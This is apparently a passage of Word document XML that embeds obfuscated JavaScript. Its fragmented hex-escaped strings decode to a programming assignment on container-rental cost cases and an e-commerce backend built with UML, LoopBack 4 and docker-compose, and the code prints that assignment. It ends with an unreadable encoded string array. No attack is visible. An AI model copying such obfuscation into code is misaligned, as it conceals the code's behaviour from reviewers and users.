'\x20\x20' + '\x20\x20' + '\x20\x20' + 'na' + 'me' + ':\x20' + '\x22C' + 'on' + 'ta' + 'in' + 'er' + '\x20r' + 'en' + 'te' + 'r\x20' + 'B\x22' + ',\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + 'co' + 'nt' + 'ai' + 'ne' + 'r:' + '\x202' + ',\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + 'to' + 'ta' + 'lC' + 'os' + 't:' + '\x201' + '0,' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20}' + ',\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '{\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + 'na' + 'me' + ':\x20' + '\x22C' + 'on' + 'ta' + 'in' + 'er' + '\x20r' + 'en' + 'te' + 'r\x20' + 'C\x22' + ',\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + 'co' + 'nt' + 'ai' + 'ne' + 'r:' + '\x202' + ',\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + 'to' + 'ta' + 'lC' + 'os' + 't:' + '\x203' + ',\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '},' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20]' + ';\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '-\x20' + 'Ou' + 'tp' + 'ut' + ':\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '[C' + 'on' + 'tr' + 'ac' + 't\x20' + 'wi' + 'th' + ']\x20' + 'Co' + 'nt' + 'ai' + 'ne' + 'r\x20' + 're' + 'nt' + 'er' + '\x20A' + '\x205' + '\x20c' + 'on' + 'ta' + 'in' + 'er' + ',\x20' + 'pr' + 'ic' + 'e:' + '\x205' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20[' + 'Co' + 'nt' + 'ra' + 'ct' + '\x20w' + 'it' + 'h]' + '\x20C' + 'on' + 'ta' + 'in' + 'er' + '\x20r' + 'en' + 'te' + 'r\x20' + 'C\x20' + '2\x20' + 'co' + 'nt' + 'ai' + 'ne' + 'r,' + '\x20p' + 'ri' + 'ce' + ':\x20' + '3\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '[C' + 'on' + 'tr' + 'ac' + 't\x20' + 'wi' + 'th' + ']\x20') + ('Co' + 'nt' + 'ai' + 'ne' + 'r\x20' + 're' + 'nt' + 'er' + '\x20B' + '\x202' + '\x20c' + 'on' + 'ta' + 'in' + 'er' + ',\x20' + 'pr' + 'ic' + 'e:' + '\x201' + '0\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + 'No' + 't\x20' + 'en' + 'ou' + 'gh' + '\x20c' + 'on' + 'ta' + 'in' + 'er' + 's\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' </w:t>
      </w:r>
      <w:r w:rsidRPr="00354151">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">+ '\x20\x20' + '[S' + 'um' + 'ma' + 'ry' + ']\x20' + 'to' + 'ta' + 'l\x20' + 'co' + 'st' + '\x201' + '8\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '-\x20' + 'Ex' + 'pl' + 'ai' + 'n:' + '\x20D' + 'is' + 'pl' + 'ay' + '\x20\x22' + 'no' + 't\x20' + 'en' + 'ou' + 'gh' + '\x20c' + 'on' + 'ta' + 'in' + 'er' + 's\x22' + '\x20i' + 'f\x20' + 'do' + 'n\x27' + 't\x20' + 'ha' + 've' + '\x20e' + 'no' + 'ug' + 'h\x20' + 'co' + 'nt' + 'ai' + 'ne' + 'r\x20' + 'pr' + 'ov' + 'id' + 'er' + 's.' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20+' + '\x20C' + 'as' + 'e\x20' + '3:' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20-' + '\x20I' + 'np' + 'ut' + ':\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + 'co' + 'ns' + 't\x20' + 'ne' + 'ed' + 'ed' + 'Co' + 'nt' + 'ai' + 'ne' + 'r\x20' + '=\x20' + '10' + ';\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + 'co' + 'ns' + 't\x20' + 'li' + 'st' + 'in' + 'gs' + '\x20=' + '\x20[' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20{' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20n' + 'am' + 'e:' + '\x20\x22' + 'Co' + 'nt' + 'ai' + 'ne' + 'r\x20' + 're' + 'nt' + 'er' + '\x20A' + '\x22,' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20c' + 'on' + 'ta' + 'in' + 'er' + ':\x20' + '5,' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20t' + 'ot' + 'al' + 'Co' + 'st' + ':\x20' + '5,' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20}' + ',\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '{\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + 'na' + 'me' + ':\x20' + '\x22C' + 'on' + 'ta' + 'in' + 'er' + '\x20r' + 'en' + 'te' + 'r\x20' + 'B\x22' + ',\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + 'co' + 'nt' + 'ai' + 'ne' + 'r:' + '\x202' + ',\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + 'to' + 'ta' + 'lC' + 'os' + 't:' + '\x201' + '0,' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20}' + ',\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '{\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + 'na' + 'me' + ':\x20' + '\x22C' + 'on' + 'ta' + 'in' + 'er' + '\x20r' + 'en' + 'te' + 'r\x20' + 'C\x22' + ',\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + 'co' + 'nt' + 'ai' + 'ne' + 'r:' + '\x201' + '0,' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20t' + 'ot' + 'al' + 'Co' + 'st' + ':\x20' + '3,' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20}' + ',\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '];' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20-' + '\x20O' + 'ut' + 'pu' + 't:' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20[' + 'Co' + 'nt' + 'ra' + 'ct' + '\x20w' + 'it' + 'h]' + '\x20C' + 'on' + 'ta' + 'in' + 'er' + '\x20r' + 'en' + 'te' + 'r\x20' + 'C\x20' + '10' + '\x20c' + 'on' + 'ta' + </w:t>
      </w:r>
      <w:r w:rsidRPr="00354151">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">'in' + 'er' + ',\x20' + 'pr' + 'ic' + 'e:' + '\x203' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20[' + 'Su' + 'mm' + 'ar' + 'y]' + '\x20t' + 'ot' + 'al' + '\x20c' + 'os' + 't\x20' + '3\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x0a\x20' + '\x20\x20' + '\x20C' + 'AS' + 'E\x20' + 'ST' + 'UD' + 'Y:' + '\x20W' + 'e\x20' + 'ar' + 'e\x20' + 'pl' + 'an' + 'ni' + 'ng' + '\x20t' + 'o\x20' + 'bu' + 'il' + 'd\x20' + 'a\x20' + 'ba' + 'ck' + 'en' + 'd\x20' + 'fo' + 'r\x20' + 'an' + '\x20e' + '-c' + 'om' + 'me' + 'rc' + 'ia' + 'l\x20' + 'pl' + 'at' + 'fo' + 'rm') + (',\x20' + 'yo' + 'ur' + '\x20t' + 'as' + 'k\x20' + 'is' + '\x20d' + 'oi' + 'ng' + '\x20f' + 'ro' + 'm\x20' + 'sy' + 'st' + 'em' + '\x20d' + 'es' + 'ig' + 'n,' + '\x20i' + 'mp' + 'le' + 'me' + 'nt' + 'at' + 'io' + 'n\x20' + 'to' + '\x20d' + 'ep' + 'lo' + 'y\x20' + 'pr' + 'od' + 'uc' + 'ti' + 'on' + '.\x0a' + '\x20\x20' + '\x20\x20' + 'SE' + 'CT' + 'IO' + 'N\x20' + 'I:' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x201' + '.\x20' + 'De' + 'si' + 'gn' + '\x20U' + 'ML' + '\x20f' + 'or' + '\x20t' + 'he' + '\x20b' + 'ac' + 'ke' + 'nd' + '\x20o' + 'f\x20' + 'th' + 'es' + 'e\x20' + 'fe' + 'at' + 'ur' + 'es' + '\x20b' + 'as' + 'ed' + '\x20o' + 'n\x20' + 'be' + 'st' + '\x20p' + 'ra' + 'ct' + 'ic' + 'es' + '\x20t' + 'o\x20' + 'en' + 'su' + 're' + '\x20s' + 'ca' + 'la' + 'bl' + 'e,' + '\x20e' + 'as' + 'y\x20' + 'co' + 'di' + 'ng' + '.\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '+\x20' + 'Cu' + 'st' + 'om' + 'er' + ':\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '-\x20' + 'Ca' + 'n\x20' + 'st' + 'or' + 'ag' + 'e\x20' + 'pe' + 'rs' + 'on' + 'al' + '\x20i' + 'nf' + 'or' + 'ma' + 'ti' + 'on' + '\x20(' + 'na' + 'me' + ',\x20' + 'ad' + 'dr' + 'es' + 's,' + '\x20e' + 'ma' + 'il' + ',\x20' + 'ph' + 'on' + 'e\x20' + 'nu' + 'mb' + 'er' + ',\x20' + 'ge' + 'nd' + 'er' + ',\x20' + 'et' + 'c.' + '..' + '),' + '\x20c' + 'ar' + 't,' + '\x20t' + 'ra' + 'ns' + 'ac' + 'ti' + 'on' + ',\x20' + 'bi' + 'll' + 'in' + 'g.' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20+' + '\x20A' + 'ge' + 'nc' + 'y:' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20-' + '\x20C' + 'an' + '\x20s' + 'to' + 'ra' + 'ge' + '\x20p' + 'er' + 'so' + 'na' + 'l\x20' + 'in' + 'fo' + 'rm' + 'at' + 'io' + 'n\x20' + '(n' + 'am' + 'e,' + '\x20a' + 'dd' + 're' + 'ss' + ',\x20' + 'em' + 'ai' + 'l,' + '\x20p' + 'ho' + 'ne' + '\x20n' + 'um' + 'be' + 'r,' + '\x20g' + 'en' + 'de' + 'r,' + '\x20e' + 'tc' + '..' + '.)' + ',\x20' + 'pr' + 'od' + 'uc' + 't,' + '\x20t' + 'ra' + 'ns' + 'ac' + 'ti' + 'on' + ',\x20' + 'bi' + 'll' + 'in' + 'g.' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20+' + '\x20A' + 'dm' + 'in' + ':\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '-\x20' + 'Ca' + 'n\x20' + 're' + 'ad' + '/c' + 're' + 'at' + 'e/' + 'up' + 'da' + 'te' + '/d' + 'el' + 'et' + 'e\x20' + 'ag' + 'en' + 'cy' + '.\x0a' + '\x0a\x20' + '\x20\x20' + '\x20S' + 'EC' + 'TI' + 'ON' + '\x20I' + 'I:' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x201' + '.\x20' + 'Wi' + 'th' + '\x20U' + 'ML' + '\x20y' + 'ou' + '\x20h' + 'av' + 'e\x20' + 'al' + 're' + 'ad' + 'y\x20' + 'de' + 'si' + 'gn' + 'ed' + '\x20o' + 'n\x20' + 'qu' + 'es' + 'ti' + 'on' + '\x201' + ',\x20' + 'wh' + 'at' + '\x20d' + 'at' + 'ab' + 'as' + 'e\x20' + 'ar' + 'e\x20' + 'yo' + 'u\x20' + 'us' + 'in' + 'g\x20' + 'to' + '\x20i' + 'mp' + 'le' + 'me' + 'nt' + '?\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '2.' + '\x20W' + 'hy' + '\x20a' + 're' + '\x20y' + 'ou' + '\x20u' + 'si' + 'ng' + '\x20t' + 'ha' + 't?' + '\x20W' + 'ha' + 't\x20' + 'is' + '\x20t' + 'he' + '\x20s' + 'tr' + 'on' + 'g\x20' + 'an' + 'd\x20' + 'we' + 'ak' + '\x20p' + 'oi' + 'nt' + '\x20o' + 'f\x20' + 'it' + '?\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '3.' + '\x20W' + 'ri' + 'te' + '\x20d' + 'oc' + 'ke' + 'r-' + 'co' + 'mp' + 'os' + 'e.' + 'ym' + 'l\x20' + </w:t>
      </w:r>
      <w:r w:rsidRPr="00354151">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">'to' + '\x20s' + 'ta' + 'rt' + '\x20t' + 'he' + '\x20d' + 'at' + 'ab' + 'as' + 'e\x20' + 'lo' + 'ca' + 'll' + 'y.' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x204' + '.\x20' + 'Se' + 'tu' + 'p\x20' + 'Lo' + 'op' + 'ba' + 'ck' + '\x204' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x205' + '.\x20' + 'Us' + 'in' + 'g\x20' + 'UM' + 'L\x20' + 'on' + '\x20q' + 'ue' + 'st' + 'io' + 'n\x20' + '1,' + '\x20s' + 'et' + '\x20u' + 'p\x20' + 'AP' + 'I\x20' + 'fo' + 'r\x20' + 'th' + 'es' + 'e\x20' + 'fe' + 'at' + 'ur' + 'es' + '.\x0a' + '\x0a\x20' + '\x20\x20' + '\x20S' + 'EC' + 'TI' + 'ON' + '\x20I' + 'I:' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x201' + '.\x20' + 'Wr' + 'it' + 'e\x20' + 'se' + 'qu' + 'en' + 'ce' + '\x20d' + 'ia' + 'gr' + 'am' + '\x20t' + 'o\x20' + 'bu' + 'il' + 'd\x20' + 'a\x20' + 'so' + 'lu' + 'ti' + 'on' + '\x20f' + 'or' + '\x20a' + 'ut' + 'he' + 'nt' + 'ic' + 'at' + 'io') + ('n\x20' + 'an' + 'd\x20' + 'au' + 'th' + 'or' + 'iz' + 'e\x20' + 'ad' + 'ap' + 't\x20' + 'th' + 'e\x20' + 'li' + 'st' + '\x20o' + 'f\x20' + 'fe' + 'at' + 'ur' + 'es' + '\x20b' + 'el' + 'ow' + '.\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '+\x20' + 'Cu' + 'st' + 'om' + 'er' + ':\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '-\x20' + 'Ca' + 'n\x20' + 'lo' + 'gi' + 'n,' + '\x20l' + 'og' + 'ou' + 't.' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20-' + '\x20R' + 'ea' + 'd\x20' + 'tr' + 'an' + 'sa' + 'ct' + 'io' + 'n,' + '\x20b' + 'il' + 'li' + 'ng' + '\x20l' + 'in' + 'ke' + 'd\x20' + 'wi' + 'th' + '\x20p' + 'ro' + 'du' + 'ct' + '.\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '-\x20' + 'Re' + 'ad' + '\x20a' + 'ge' + 'nc' + 'y\x20' + 'in' + 'fo' + 'rm' + 'at' + 'io' + 'n.' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20+' + '\x20A' + 'ge' + 'nc' + 'y:' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20-' + '\x20A' + 'ge' + 'nc' + 'y\x20' + 'ca' + 'n\x20' + 're' + 'ad' + '/c' + 're' + 'at' + 'e/' + 'up' + 'da' + 'te' + '/d' + 'el' + 'et' + 'e\x20' + 'of' + '\x20o' + 'wn' + 'er' + '\x20p' + 'ro' + 'du' + 'ct' + '.\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '-\x20' + 'Ag' + 'en' + 'cy' + '\x20c' + 'an' + '\x20r' + 'ea' + 'd\x20' + 'tr' + 'an' + 'sa' + 'ct' + 'io' + 'n,' + '\x20b' + 'il' + 'li' + 'ng' + '\x20o' + 'f\x20' + 'ow' + 'ne' + 'r.' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20+' + '\x20A' + 'dm' + 'in' + ':\x20' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20-' + '\x20R' + 'ea' + 'd\x20' + 'bi' + 'll' + 'in' + 'g,' + '\x20t' + 'ra' + 'ns' + 'ac' + 'ti' + 'on' + '\x20l' + 'in' + 'ke' + 'd\x20' + 'pr' + 'od' + 'uc' + 't,' + '\x20c' + 'us' + 'to' + 'me' + 'r,' + '\x20a' + 'ge' + 'nc' + 'y.' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20+' + '\x20C' + 'om' + 'mo' + 'n:' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20-' + '\x20U' + 'se' + 'r\x20' + 'ca' + 'n\x20' + 'st' + 'or' + 'e\x20' + 'au' + 'th' + '\x20s' + 'ta' + 'te' + '\x20a' + 'ft' + 'er' + '\x20r' + 'eo' + 'pe' + 'n\x20' + 'br' + 'ow' + 'se' + 'r.' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x202' + '.\x20' + 'Us' + 'in' + 'g\x20' + 'so' + 'lu' + 'ti' + 'on' + '\x20o' + 'n\x20' + 'qu' + 'es' + 'ti' + 'on' + '\x201' + ',\x20' + 'im' + 'pl' + 'em' + 'en' + 'ts' + '\x20l' + 'oo' + 'pb' + 'ac' + 'k4' + '\x20f' + 'or' + '\x20t' + 'he' + 'se' + '\x20f' + 'ea' + 'tu' + 're' + 's.' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x203' + '.\x20' + 'Wh' + 'at' + '\x27s' + '\x20t' + 'he' + '\x20s' + 'tr' + 'on' + 'g\x20' + 'an' + 'd\x20' + 'we' + 'ak' + '\x20p' + 'oi' + 'nt' + '\x20o' + 'f\x20' + 'yo' + 'ur' + '\x20s' + 'ol' + 'ut' + 'io' + 'n?' + '\x20H' + 'ow' + '\x20t' + 'o\x20' + 'im' + 'pr' + 'ov' + 'e\x20' + 'th' + 'at' + '?\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '4.' + '\x20W' + 'ri' + 'te' + '\x20s' + 'eq' + 'ue' + 'nc' + 'e\x20' + 'di' + 'ag' + 'ra' + </w:t>
      </w:r>
      <w:r w:rsidRPr="00354151">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>'m\x20' + 'to' + '\x20b' + 'ui' + 'ld' + '\x20a' + '\x20s' + 'ol' + 'ut' + 'io' + 'n\x20' + 'fo' + 'r\x20' + 'te' + 'st' + 'in' + 'g,' + '\x20e' + 'ns' + 'ur' + 'e\x20' + 'co' + 'rr' + 'ec' + 't\x20' + 'pe' + 'rm' + 'is' + 'si' + 'on' + '\x20s' + 'ca' + 'la' + 'bl' + 'e\x20' + 'fr' + 'om' + '\x201' + '00' + '\x20A' + 'PI' + 's\x20' + 'to' + '\x201' + '00' + '0\x20' + 'AP' + 'Is' + '.\x0a' + '\x0a\x20' + '\x20\x20' + '\x20S' + 'EC' + 'TI' + 'ON' + '\x20I' + 'II' + ':\x20' + 'Go' + 'od' + '\x20j' + 'ob' + ',\x20' + 'ri' + 'gh' + 't\x20' + 'no' + 'w\x20' + 'ou' + 'r\x20' + 'ap' + 'pl' + 'ic' + 'at' + 'io' + 'n\x20' + 'ne' + 'ed' + 's\x20' + 'to' + '\x20s' + 'yn' + 'ch' + 'ro' + 'ni' + 'ze' + '\x20p' + 'ro' + 'du' + 'ct' + 's,' + '\x20p' + 'ri' + 'ci' + 'ng' + '\x20o' + 'f\x20' + 'th' + 'e\x20' + 'Ag' + 'en' + 'cy' + '\x20b' + 'y\x20' + 'us' + 'in' + 'g\x20' + 'th' + 'ir' + 'd-' + 'pa' + 'rt' + 'y\x20' + 'AP' + 'I.' + '\x20\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '1.' + '\x20W' + 'ri' + 'te' + '\x20s' + 'eq' + 'ue' + 'nc' + 'e\x20' + 'di' + 'ag' + 'ra' + 'm\x20' + 'to' + '\x20b' + 'ui' + 'ld' + '\x20a' + '\x20s' + 'ol' + 'ut' + 'io' + 'n\x20' + 'to' + '\x20s' + 'av' + 'e,' + '\x20m' + 'er' + 'ge' + '\x20p') + ('ro' + 'du' + 'ct' + 's\x20' + 'da' + 'ta' + '\x20f' + 'ro' + 'm\x20' + 'th' + 'ir' + 'd-' + 'pa' + 'rt' + 'y\x20' + 'AP' + 'I\x20' + 'to' + '\x20o' + 'ur' + '\x20d' + 'at' + 'ab' + 'as' + 'e.' + '\x20(' + 'Th' + 'ir' + 'd-' + 'pa' + 'rt' + 'y\x20' + 'AP' + 'I\x20' + 'da' + 'ta' + '\x20c' + 'ha' + 'ng' + 'e\x20' + 'ev' + 'er' + 'y\x20' + 'ho' + 'ur' + ')\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '2.' + '\x20W' + 'ha' + 't\x27' + 's\x20' + 'th' + 'e\x20' + 'st' + 'ro' + 'ng' + '\x20a' + 'nd' + '\x20w' + 'ea' + 'k\x20' + 'po' + 'in' + 't\x20' + 'of' + '\x20y' + 'ou' + 'r\x20' + 'so' + 'lu' + 'ti' + 'on' + '?\x20' + 'Ho' + 'w\x20' + 'to' + '\x20i' + 'mp' + 'ro' + 've' + '\x20t' + 'ha' + 't?' + '\x0a\x20' + '\x20\x20' + '\x20\x0a' + '\x20\x20' + '\x20\x20' + 'SE' + 'CT' + 'IO' + 'N\x20' + 'IV' + ':\x0a' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '1.' + '\x20W' + 'ri' + 'te' + '\x20a' + 'n\x20' + 'ar' + 'ch' + 'it' + 'ec' + 'tu' + 're' + '\x20d' + 'ia' + 'gr' + 'am' + '\x20t' + 'o\x20' + 'bu' + 'il' + 'd\x20' + 'a\x20' + 'so' + 'lu' + 'ti' + 'on' + '\x20a' + 'da' + 'pt' + '\x20t' + 'he' + '\x20l' + 'is' + 't\x20' + 'of' + '\x20f' + 'ea' + 'tu' + 're' + 's\x20' + 'be' + 'lo' + 'w.' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20+' + '\x20E' + 'ns' + 'ur' + 'e\x20' + 'is' + 'ol' + 'at' + 'in' + 'g\x20' + 'de' + 've' + 'lo' + 'pm' + 'en' + 't\x20' + 'an' + 'd\x20' + 'pr' + 'od' + 'uc' + 'ti' + 'on' + '\x20d' + 'at' + 'a.' + '\x20(' + 'Do' + 'n\x27' + 't\x20' + 'me' + 'rg' + 'e\x20' + 'da' + 'ta' + '\x20t' + 'og' + 'et' + 'he' + 'r)' + '\x0a\x20' + '\x20\x20' + '\x20\x20' + '\x20\x20' + '\x20+' + '\x20A' + 'pp' + 'ly' + '\x20G' + 'it' + 'la' + 'b\x20' + 'CI' + '\x20o' + 'r\x20' + 'Gi' + 'th' + 'ub' + '\x20A' + 'ct' + 'io' + 'n\x20' + 'to' + '\x20t' + 'es' + 't,' + '\x20b' + 'ui' + 'ld' + '\x20a' + 'nd' + '\x20d' + 'ep' + 'lo' + 'y\x20' + 'to' + '\x20H' + 'er' + 'ok' + 'u\x20' + 'au' + 'to' + 'ma' + 'ti' + 'ca' + 'll' + 'y.' + '\x0a\x20' + '\x20');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632CC7D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console['lo' + 'g'](_0x604f59);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FC5BA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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3753EA02" w14:textId="77777777" w:rsidR="00354151" w:rsidRPr="00354151" w:rsidRDefault="00354151" w:rsidP="00354151">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2945233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>function a0_0x5dbf() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C65FD8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const _0x1f8d5f = ['BCo5tSkVWPJcRcOIB2JcUHhdUa', 'WRhdHbBdQY51ecPbkuqXWQS', 'W7ldVqmMBSopymkJ', 'WQNdLbTUFmoLWOuudSoWp1NdPq', </w:t>
      </w:r>
      <w:r w:rsidRPr="00354151">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>'WRldUGRcL8ozWOupCaDXWPpdICko', 'WOhcPCkuW70tW6GfzXhdOSk4pai', 'WR8VW5HcgZhdLLRdGtCJWQmz', 'WRBdVGVdQSk/W6XODI8', 'rmo5ymosDCkQWQrqW4b3WPW', 'DxhdO8k/nJD1CW', 'WOaTcCkspCkUWQpdPJj8WPi', 'WRxdGe/cN0uOBrO', 'WOuObSkrmCknWQxdMbLIWQ4', 'gKzApCkTWOSBWPCnWP7cO8oehq', 'hKDBmSkSW6XSWOSMWOlcMq', 'Amo+a8oZW4FdTh4k', 'E8kZWO7cIZC5WPe+bI1sW6DQ', 'W7xcRqyUssmHDsupjmktna', 'd8kpW5CcWR8uy8oQbq', 'WRtcKCo5gmk+uXqZ', 'gmksWQVcMtOdw8ks', 'WQRdKrvLF8oGWO8Dh8o5l33dNG'];</w:t>
      </w:r>
    </w:p>
